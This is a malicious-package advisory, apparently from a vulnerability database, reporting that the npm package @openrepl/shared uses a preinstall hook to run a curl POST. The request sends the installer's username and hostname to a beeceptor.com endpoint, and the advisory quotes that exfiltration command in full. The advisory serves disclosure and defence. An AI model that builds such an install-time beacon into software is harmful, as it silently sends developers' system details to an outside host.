MAL-2026-14057
Malicious code in @openrepl/shared (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2fcd297122e7aac00cd0d3d92fcb5f1fc00b6c558571a037b5447eb64bd443b8) package.json declares a preinstall hook (`node index.js`) that runs automatically on `npm install`. index.js shells out via `child_process` to execute `curl -X POST` against `https://youjoex.free.beeceptor.com/$(whoami)/$(hostname)`, embedding the installer's OS username and hostname (captured via command substitution) in the URL path. beeceptor.com is a public request-inspection service commonly used as a low-effort exfiltration sink. The package advertises no functionality that would justify this network beacon and ships no other library code consistent with its `shared` name.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for @openrepl/shared (npm). Pin to a known-safe version or switch to an alternative.